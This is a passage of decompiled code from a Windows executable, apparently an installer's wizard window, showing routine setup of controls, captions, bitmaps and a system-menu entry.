				}
				_t582 =  *0x49b328; // 0x2262ab4
				_t1870 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x250)) + 0x2c)) -  *((intOrPtr*)( *_t582 + 0x20))();
				if(_t1870 > 0) {
					_t1908 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x250)) + 0x2c)) - _t1870;
					E00414604( *((intOrPtr*)( *_t1471 + 0x250)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x250)) + 0x2c)) - _t1870);
					_t1846 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x250)) + 0x24));
					_t1870 = _t1870 >> 1;
					if(_t1908 < 0) {
						asm("adc esi, 0x0");
					}
					_t1909 = _t1846 + _t1870;
					E004145C4( *((intOrPtr*)( *_t1471 + 0x250)));
				}
				E00493D18( *_t1471, _t1909);
				_t1910 =  *0x49b29a & 0x00000020;
				if(( *0x49b29a & 0x00000020) == 0) {
					E00493C84( *_t1471);
				} else {
					_t1843 =  *0x49b088; // 0x2286214
					E00493B60( *_t1471, 1, _t1843);
				}
				_t1474 =  *0x49b2d8; // 0xc
				_t1540 =  *0x49b2b0; // 0x2279858
				E00493674( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x234)) + 0x44)), _t1471, _t1474, _t1540, _t1852, _t1870, 0xc, 0);
				_t1541 =  *0x467e7c; // 0x1
				E0041A3B8( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x234)) + 0x44)), _t1541, _t1910);
				_t1542 =  *0x467e7c; // 0x1
				E0041A3B8( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x248)) + 0x44)), _t1542, _t1910);
				if(( *0x49b29a & 0x00000020) == 0) {
					_t1474 =  &_v52;
					_t1543 =  *0x49b39c; // 0x2278c20
					E004507B8(0x99,  &_v52, _t1543);
					E00414B00( *_t1471, _t1471, _v52, _t1852, _t1870);
				} else {
					_t1842 =  *0x49ae78; // 0x227eb84
					E00414B00( *_t1471, _t1471, _t1842, _t1852, _t1870);
				}
				if(( *0x49b29a & 0x00000020) == 0) {
					_v40 = E004146A4( *_t1471);
					_v44 = E004146E8( *_t1471);
					_t1913 =  *( *_t1471 + 0x110) |  *0x467e80;
					E00420F80( *_t1471, _t1474,  *( *_t1471 + 0x110) |  *0x467e80);
					E00420FAC( *_t1471, 1);
					E00420B50( *_t1471, _v40);
					E00420B7C( *_t1471, _v44);
				}
				_v60 = 0xa;
				_v59 = 0xc;
				_v58 = 0xd;
				_v57 = 0xe;
				_v56 = 0x10;
				_t1871 = E00493AB0( *_t1471, _t1471, 4,  &_v60, _t1852, _t1870, _t1913);
				_v20 = E00493DD4( *_t1471, 0xa);
				E00414604( *((intOrPtr*)( *_t1471 + 0x1c0)), _t1871);
				E00414604( *((intOrPtr*)( *_t1471 + 0x1bc)), _t1871);
				E00414604( *((intOrPtr*)( *_t1471 + 0x1b8)), _t1871);
				_t618 = E004146A4( *_t1471);
				E004145C4( *((intOrPtr*)( *_t1471 + 0x1b8)));
				E004145C4( *((intOrPtr*)( *_t1471 + 0x1bc)));
				_t1858 = _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871;
				E004145C4( *((intOrPtr*)( *_t1471 + 0x1c0)));
				_t1553 =  *0x49b260; // 0x400000
				E0045FFA0( *((intOrPtr*)( *_t1471 + 0x230)), _t1553);
				E0045FFB8( *((intOrPtr*)( *_t1471 + 0x230)));
				E0045FFC4( *((intOrPtr*)( *_t1471 + 0x230)), 1);
				E0046000C( *((intOrPtr*)( *_t1471 + 0x230)), 0 | ( *0x49b29e & 0x00000004) != 0x00000000);
				_t1557 =  *0x49b260; // 0x400000
				E0045FFA0( *((intOrPtr*)( *_t1471 + 0x264)), _t1557);
				E0045FFB8( *((intOrPtr*)( *_t1471 + 0x264)));
				E0045FFC4( *((intOrPtr*)( *_t1471 + 0x264)), 1);
				E0046000C( *((intOrPtr*)( *_t1471 + 0x264)), 0 | ( *0x49b29e & 0x00000004) != 0x00000000);
				_t1561 =  *0x49b328; // 0x2262ab4
				E0045FFB8( *((intOrPtr*)( *_t1471 + 0x250)));
				_t1916 =  *0x49b29e & 0x00000004;
				E0046000C( *((intOrPtr*)( *_t1471 + 0x250)), _t1561 & 0xffffff00 | ( *0x49b29e & 0x00000004) != 0x00000000);
				_t658 =  *0x49a014; // 0x400000
				E0041D698( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2bc)) + 0xb4)), LoadBitmapA(_t658, "STOPIMAGE"));
				E0045FFDC( *((intOrPtr*)( *_t1471 + 0x2bc)), 0xc0c0c0);
				E0045FFF4( *((intOrPtr*)( *_t1471 + 0x2bc)),  *((intOrPtr*)( *_t1471 + 0x48)));
				E00466504(_t1471, 4, _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871, _t1871,  *0x49b29e & 0x00000004, _t1900); // executed
				E00468030( *_t1471, 1,  *0x49b29e & 0x00000004, 0, 0, 0);
				E00465B80(0xbd,  &_v52);
				E0040357C( &_v52, 0x467e98);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x234)), _t1471, _v52, _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871, _t1871);
				E00465EB8( *((intOrPtr*)( *_t1471 + 0x234)));
				E00465EC0( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x234)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x234)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x268)) + 0x28)),  *((intOrPtr*)( *_t1471 + 0x268)));
				E00465B80(0xbe,  &_v52);
				E0040357C( &_v52, 0x467ea4);
				_t1574 =  *0x49ac90; // 0x227c7ec
				E0040357C( &_v52, _t1574);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x268)), _t1471, _v52, _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871, _t1871);
				_t701 =  *0x49af38; // 0x227f630
				_t702 =  *0x49adb8; // 0x227dcf4
				E00468030( *_t1471, 2,  *0x49b29e & 0x00000004, _t702, _t701,  *((intOrPtr*)( *_t1471 + 0x1d8)));
				E00465B80(0x65,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x26c)), _t1471, _v52, _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871, _t1871);
				E00465EC0(E00465EB8( *((intOrPtr*)( *_t1471 + 0x26c))),  *((intOrPtr*)( *_t1471 + 0x270)));
				_t1581 =  *0x49adb4; // 0x227dcd0
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2a4)), _t1471, _t1581, _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871, _t713);
				_t1582 =  *0x49adc0; // 0x227ddd4
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2a8)), _t1471, _t1582, _t618 - _v20 - _t1871 - _v20 - _t1871 - _t1871, _t713);
				_t725 =  *0x49af3c; // 0x227f650
				_t726 =  *0x49adf4; // 0x227e1a8
				E00468030( *_t1471, 3,  *0x49b29e & 0x00000004, _t726, _t725,  *((intOrPtr*)( *_t1471 + 0x1dc)));
				_t1584 =  *0x49adf8; // 0x227e1e0
				E00414B00( *((intOrPtr*)( *_t1471 + 0x218)), _t1471, _t1584, _t1858, _t713);
				_t1585 =  *0x49adf0; // 0x227e190
				E00414B00( *((intOrPtr*)( *_t1471 + 0x220)), _t1471, _t1585, _t1858, _t713);
				E004145E4( *((intOrPtr*)( *_t1471 + 0x220)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x220)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x218))));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x21c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x21c)) + 0x28)) + _t738 + E00465EB8( *((intOrPtr*)( *_t1471 + 0x220))));
				_t750 =  *0x49af30; // 0x227f600
				_t751 =  *0x49ad8c; // 0x227da28
				E00468030( *_t1471, 4,  *0x49b29e & 0x00000004, _t751, _t750,  *((intOrPtr*)( *_t1471 + 0x1e0)));
				_t1593 =  *0x49ad88; // 0x227d9e4
				E00414B00( *((intOrPtr*)( *_t1471 + 0x23c)), _t1471, _t1593, _t1858, _t738 + E00465EB8( *((intOrPtr*)( *_t1471 + 0x220))));
				E00465EC0(E00465EB8( *((intOrPtr*)( *_t1471 + 0x23c))),  *((intOrPtr*)( *_t1471 + 0x238)));
				_t766 =  *0x49af5c; // 0x227f760
				_t767 =  *0x49af08; // 0x227f408
				_t1486 =  *((intOrPtr*)( *_t1471 + 0x1d0));
				E00468030( *_t1471, 5, _t1916, _t767, _t766,  *((intOrPtr*)( *_t1471 + 0x1e4)));
				_t1597 =  *0x49af0c; // 0x227f434
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2ac)), _t1471, _t1597, _t1858, _t760);
				_t1876 = E00465EB8( *((intOrPtr*)( *_t1471 + 0x2ac)));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x2b0)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2b0)) + 0x28)) + _t1876);
				E004145E4( *((intOrPtr*)( *_t1471 + 0x2b4)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2b4)) + 0x28)) + _t1876);
				_t1603 =  *0x49af14; // 0x227f470
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2b4)), _t1471, _t1603, _t1858, _t1876);
				_t1877 = _t1876 + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2b4)));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x2b8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2b8)) + 0x28)) + _t1877);
				_t1917 =  *0x49b375;
				if( *0x49b375 == 0) {
					E00414A2C( *((intOrPtr*)( *_t1471 + 0x2c8)), _t1486, 0, _t1858);
					__eflags = 0;
					E00414A2C( *((intOrPtr*)( *_t1471 + 0x2cc)), _t1486, 0, _t1858);
				} else {
					E004145E4( *((intOrPtr*)( *_t1471 + 0x2c8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2c8)) + 0x28)) + _t1877);
					_t1833 =  *0x49af18; // 0x227f48c
					E00414B00( *((intOrPtr*)( *_t1471 + 0x2c8)), _t1471, _t1833, _t1858, _t1877);
					E004145E4( *((intOrPtr*)( *_t1471 + 0x2cc)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2cc)) + 0x28)) + _t1877);
				}
				_t800 =  *0x49af48; // 0x227f6ac
				E00465B80(0x87,  &_v52);
				E00468030( *_t1471, 6, _t1917, _v52, _t800,  *((intOrPtr*)( *_t1471 + 0x1e8)));
				E00465B80(0x89,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x294)), _t1471, _v52, _t1858, _t1877);
				_t813 = E00493DD4( *_t1471, 0xc);
				_t1878 =  *((intOrPtr*)( *_t1471 + 0x2e0));
				_t1860 = _t813 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x24)) +  *((intOrPtr*)(_t1878 + 0x2c));
				_t1879 =  *((intOrPtr*)( *_t1471 + 0x294));
				_t1880 =  *_t1879;
				 *((intOrPtr*)( *_t1879 + 0x4c))( *((intOrPtr*)(_t1879 + 0x30)),  *((intOrPtr*)(_t1879 + 0x2c)) - _t813 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x24)) +  *((intOrPtr*)(_t1878 + 0x2c)) -  *((intOrPtr*)(_t1879 + 0x24)));
				E00465EB8( *((intOrPtr*)( *_t1471 + 0x294)));
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x30)) >  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x294)) + 0x30))) {
					_t1828 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x294)) + 0x30)) - 1;
					_t1829 = _t1828 >> 1;
					if(_t1828 < 0) {
						asm("adc edx, 0x0");
					}
					_t1920 = _t1829 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x294)) + 0x28));
					E004145E4( *((intOrPtr*)( *_t1471 + 0x294)), _t1829 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x294)) + 0x28)));
				}
				E00465B80(0x86,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2e8)), _t1471, _v52, _t1860, _t1880);
				_push(E00493DE4( *_t1471, 0xd) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x294)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x294)) + 0x30)) - 1);
				_t838 = E00493DE4( *_t1471, 0xc);
				_pop(_t1631);
				E004145E4( *((intOrPtr*)( *_t1471 + 0x2e8)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e8)) + 0x28)) + E0042E70C(_t838 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x30)), _t1631) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e8)) + 0x28)));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x20c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x20c)) + 0x28)) + E0042E70C(_t838 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x30)), _t1631) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e8)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2e8))));
				_t1639 =  *0x49ac78; // 0x227c718
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2d8)), _t1471, _t1639,  *((intOrPtr*)( *_t1471 + 0x294)), E0042E70C(_t838 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x30)), _t1631) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e8)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2e8))));
				_v64 = 0x14;
				_t859 = E00493AB0( *_t1471, _t1471, 0,  &_v64,  *((intOrPtr*)( *_t1471 + 0x294)), E0042E70C(_t838 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e0)) + 0x30)), _t1631) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e8)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2e8))), _t1920);
				_t1862 = _t859;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2d8)))) + 0x4c))( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2d8)) + 0x30)), _t859);
				E00414604( *((intOrPtr*)( *_t1471 + 0x20c)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2d8)) + 0x24)) - E00493DD4( *_t1471, 0xa) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x20c)) + 0x24)));
				E00465B80(0x29,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x208)), _t1471, _v52, _t859,  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2d8)))));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x208)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x208)) + 0x28)) - E00465EB8( *((intOrPtr*)( *_t1471 + 0x208))));
				_t889 =  *0x49af4c; // 0x227f6d4
				E00465B80(0x84,  &_v52);
				E00468030( *_t1471, 7, _t1920, _v52, _t889,  *((intOrPtr*)( *_t1471 + 0x1ec)));
				E00465B80(0x85,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x29c)), _t1471, _v52, _t859,  *((intOrPtr*)( *_t1471 + 0x208)));
				_t1886 = E00465EB8( *((intOrPtr*)( *_t1471 + 0x29c)));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x228)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x228)) + 0x28)) + _t1886);
				_t1493 = _t1886;
				E00465EC0(_t1886,  *((intOrPtr*)( *_t1471 + 0x27c)));
				E00465B80(0x1e,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x280)), _t1471, _v52, _t859, _t1886);
				E00465EB8( *((intOrPtr*)( *_t1471 + 0x280)));
				if( *0x49b37d != 0) {
					_t1394 =  *0x49b2f0; // 0x22679fc
					if( *((intOrPtr*)(_t1394 + 8)) == 1) {
						E00414A2C( *((intOrPtr*)( *_t1471 + 0x228)), _t1493, 0, _t1862);
						_t1923 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x228)) + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x27c)) + 0x28));
						E00465EC0( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x228)) + 0x28)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x27c)) + 0x28)),  *((intOrPtr*)( *_t1471 + 0x27c)));
					}
				}
				_t922 =  *0x49af50; // 0x227f6f4
				E00465B80(0x8e,  &_v52);
				E00468030( *_t1471, 8, _t1923, _v52, _t922,  *((intOrPtr*)( *_t1471 + 0x1f0)));
				E00465B80(0x8f,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x298)), _t1471, _v52, _t1862, _t1886);
				_t935 = E00493DD4( *_t1471, 0xc);
				_t1864 = _t935 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x24)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x2c));
				_t1887 =  *((intOrPtr*)( *_t1471 + 0x298));
				_t1888 =  *_t1887;
				 *((intOrPtr*)( *_t1887 + 0x4c))( *((intOrPtr*)(_t1887 + 0x30)),  *((intOrPtr*)(_t1887 + 0x2c)) - _t935 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x24)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x2c)) -  *((intOrPtr*)(_t1887 + 0x24)));
				E00465EB8( *((intOrPtr*)( *_t1471 + 0x298)));
				if( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x30)) >  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x298)) + 0x30))) {
					_t1822 =  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x30)) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x298)) + 0x30)) - 1;
					_t1823 = _t1822 >> 1;
					if(_t1822 < 0) {
						asm("adc edx, 0x0");
					}
					_t1926 = _t1823 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x298)) + 0x28));
					E004145E4( *((intOrPtr*)( *_t1471 + 0x298)), _t1823 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x298)) + 0x28)));
				}
				E00465B80(0x8d,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2ec)), _t1471, _v52, _t1864, _t1888);
				_push(E00493DE4( *_t1471, 0xd) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x298)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x298)) + 0x30)) - 1);
				_t961 = E00493DE4( *_t1471, 0xc);
				_pop(_t1691);
				E004145E4( *((intOrPtr*)( *_t1471 + 0x2ec)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2ec)) + 0x28)) + E0042E70C(_t961 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x30)), _t1691) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2ec)) + 0x28)));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x210)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x210)) + 0x28)) + E0042E70C(_t961 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x30)), _t1691) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2ec)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2ec))));
				_t1697 =  *0x49ac78; // 0x227c718
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2dc)), _t1471, _t1697, _t1864, E0042E70C(_t961 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x30)), _t1691) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2ec)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2ec))));
				_v64 = 0x14;
				_t983 = E00493AB0( *_t1471, _t1471, 0,  &_v64, _t1864, E0042E70C(_t961 +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2e4)) + 0x30)), _t1691) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2ec)) + 0x28)) + E00465EB8( *((intOrPtr*)( *_t1471 + 0x2ec))), _t1926);
				_t1865 = _t983;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2dc)))) + 0x4c))( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2dc)) + 0x30)), _t983);
				E00414604( *((intOrPtr*)( *_t1471 + 0x210)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2dc)) + 0x24)) - E00493DD4( *_t1471, 0xa) -  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x210)) + 0x24)));
				_t1707 =  *0x49add0; // 0x227df04
				E00414B00( *((intOrPtr*)( *_t1471 + 0x214)), _t1471, _t1707, _t983,  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2dc)))));
				_t1006 =  *0x49af54; // 0x227f71c
				E00465B80(0x90,  &_v52);
				E00468030( *_t1471, 9, _t1926, _v52, _t1006,  *((intOrPtr*)( *_t1471 + 0x1f4)));
				E00465B80(0x91,  &_v52);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2a0)), _t1471, _v52, _t983,  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2dc)))));
				E00465EC0(E00465EB8( *((intOrPtr*)( *_t1471 + 0x2a0))),  *( *_t1471 + 0x2d0));
				E0042BBB8( *( *_t1471 + 0x2d0), 0);
				 *((intOrPtr*)( *( *_t1471 + 0x2d0) + 0x154)) = E00493DE4( *_t1471, 0x16);
				_t1927 =  *0x49b29e & 0x00000001;
				E0044DEE8( *( *_t1471 + 0x2d0),  *( *_t1471 + 0x2d0) & 0xffffff00 | ( *0x49b29e & 0x00000001) != 0x00000000);
				_t1034 =  *0x49af44; // 0x227f68c
				E00465B80(0x79,  &_v52);
				E00468030( *_t1471, 0xa,  *0x49b29e & 0x00000001, _v52, _t1034,  *((intOrPtr*)( *_t1471 + 0x1f8)));
				_t1043 =  *0x49af40; // 0x227f668
				E00465B80(0x77,  &_v52);
				E00468030( *_t1471, 0xb,  *0x49b29e & 0x00000001, _v52, _t1043,  *((intOrPtr*)( *_t1471 + 0x1fc)));
				_t1723 =  *0x49af60; // 0x227f780
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2f0)), _t1471, _t1723, _t983, _t1020);
				_t1724 =  *0x49add4; // 0x227df34
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2f4)), _t1471, _t1724, _t983, _t1020);
				_t1058 =  *0x49af34; // 0x227f618
				E00465B80(0x5b,  &_v52);
				E00468030( *_t1471, 0xc,  *0x49b29e & 0x00000001, _v52, _t1058,  *((intOrPtr*)( *_t1471 + 0x200)));
				_t1067 =  *0x49af2c; // 0x227f5e8
				_t1068 =  *0x49ad84; // 0x227d994
				E00468030( *_t1471, 0xd,  *0x49b29e & 0x00000001, _t1068, _t1067,  *((intOrPtr*)( *_t1471 + 0x204)));
				_t1728 =  *0x49ad80; // 0x227d950
				E00414B00( *((intOrPtr*)( *_t1471 + 0x278)), _t1471, _t1728, _t983, _t1020);
				E00465EC0(E00465EB8( *((intOrPtr*)( *_t1471 + 0x278))),  *((intOrPtr*)( *_t1471 + 0x274)));
				E00468030( *_t1471, 0xe,  *0x49b29e & 0x00000001, 0, 0, 0);
				_t1511 =  *0x49b2d8; // 0xc
				_t1732 =  *0x49b2b0; // 0x2279858
				E00493674( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2c4)) + 0x44)), _t1471, _t1511, _t1732, _t1865, _t1077, 0xc, 0);
				_t1733 =  *0x467e7c; // 0x1
				E0041A3B8( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2c4)) + 0x44)), _t1733, _t1927);
				E00465B80(0x4e,  &_v52);
				_push( &_v52);
				_pop(_t1095);
				E0040357C(_t1095, 0x467e98);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x2c4)), _t1471, _v52, _t1865, _t1077);
				E00465EB8( *((intOrPtr*)( *_t1471 + 0x2c4)));
				E004145E4( *((intOrPtr*)( *_t1471 + 0x258)),  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2c4)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2c4)) + 0x30)));
				_t1740 =  *0x49af60; // 0x227f780
				E00414B00( *((intOrPtr*)( *_t1471 + 0x25c)), _t1471, _t1740, _t1865, _t1077);
				_t1741 =  *0x49add4; // 0x227df34
				E00414B00( *((intOrPtr*)( *_t1471 + 0x260)), _t1471, _t1741, _t1865, _t1077);
				 *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x2d4)) + 0x154)) = E00493DE4( *_t1471, 0x16);
				E00403494( &_v52, 0x467eb4);
				_t1746 =  *0x49ac44; // 0x0
				E0040357C( &_v52, _t1746);
				E0040357C( &_v52, 0x467eb4);
				E00414B00( *((intOrPtr*)( *_t1471 + 0x284)), _t1471, _v52, _t1865, _t1077);
				if( *0x49b32c != 0) {
					E0044F4FC( *((intOrPtr*)( *_t1471 + 0x270)), 1);
					E0044F658();
				}
				if( *0x49b330 != 0) {
					E0044F4FC( *((intOrPtr*)( *_t1471 + 0x238)), 1);
					E0044F658();
				}
				if( *0x49b334 != 0) {
					E0044F4FC( *((intOrPtr*)( *_t1471 + 0x274)), 1);
					E0044F658();
				}
				_t1895 = GetSystemMenu(E004181C8( *_t1471), 0);
				AppendMenuA(_t1895, 0x800, 0, 0);
				_t1131 =  *0x49ac28; // 0x227c480
				AppendMenuA(_t1895, 0, 0x270f, E00403738(_t1131));
				E00468124( *_t1471, _t1471, _t1511, _t1865, _t1895); // executed
				if( *0x49b294 == 2 ||  *0x49b294 == 0 &&  *((intOrPtr*)( *_t1471 + 0x348)) != 0) {
					_t1136 = 1;
				} else {
					_t1136 = 0;
				}
				 *((char*)( *_t1471 + 0x330)) = _t1136;
				if( *0x49b295 == 2 ||  *0x49b295 == 0 &&  *((intOrPtr*)( *_t1471 + 0x308)) != 0) {
					_t1137 = 1;
				} else {
					_t1137 = 0;
				}
				 *((char*)( *_t1471 + 0x331)) = _t1137;
				_v28 = 0xffffffff;
				_v29 = 0;
				if(( *0x49b29d & 0x00000010) != 0) {
					if( *((intOrPtr*)( *_t1471 + 0x310)) != 0) {
						E00414B00( *((intOrPtr*)( *_t1471 + 0x2b0)), _t1471,  *((intOrPtr*)( *_t1471 + 0x310)), _t1865, _t1895);
						E00414B00( *((intOrPtr*)( *_t1471 + 0x2b8)), _t1471,  *((intOrPtr*)( *_t1471 + 0x314)), _t1865, _t1895);
						E00414B00( *((intOrPtr*)( *_t1471 + 0x2cc)), _t1471,  *((intOrPtr*)( *_t1471 + 0x318)), _t1865, _t1895);
					} else {
						_t1348 =  *0x49b1b0; // 0x2278de8
						E0047AA00(_t1348, _t1511,  &_v52);
						E00414B00( *((intOrPtr*)( *_t1471 + 0x2b0)), _t1471, _v52, _t1865, _t1895);
						_t1353 =  *0x49b1b4; // 0x2278e08
						E0047AA00(_t1353, _t1511,  &_v52);
						E00414B00( *((intOrPtr*)( *_t1471 + 0x2b8)), _t1471, _v52, _t1865, _t1895);
						_t1358 =  *0x49b1b8; // 0x0
						E0047AA00(_t1358, _t1511,  &_v52);
						E00414B00( *((intOrPtr*)( *_t1471 + 0x2cc)), _t1471, _v52, _t1865, _t1895);
					}
				}
				if(( *0x49b29a & 0x00000002) == 0) {
					_t1751 =  *0x49b124; // 0x228fefc
					E00414B00( *((intOrPtr*)( *_t1471 + 0x20c)), _t1471, _t1751, _t1865, _t1895);
				} else {
					_t1315 =  *0x49b194; // 0x2278d00
					E0047AA00(_t1315, _t1511,  &_v52);
					E00403450( *_t1471 + 0x300, _t1471, _v52, _t1865, _t1895);
					_t1940 =  *0x49b0a8;
					if( *0x49b0a8 == 0) {
						E00403494( &_v24,  *((intOrPtr*)( *_t1471 + 0x348)));
						__eflags = _v24;
						if(_v24 == 0) {
							E00403494( &_v24,  *((intOrPtr*)( *_t1471 + 0x300)));
						}
					} else {
						_t1805 =  *0x49b0a8; // 0x0
						E00403494( &_v24, _t1805);
					}
					E0042C7A8(_v24,  &_v68);
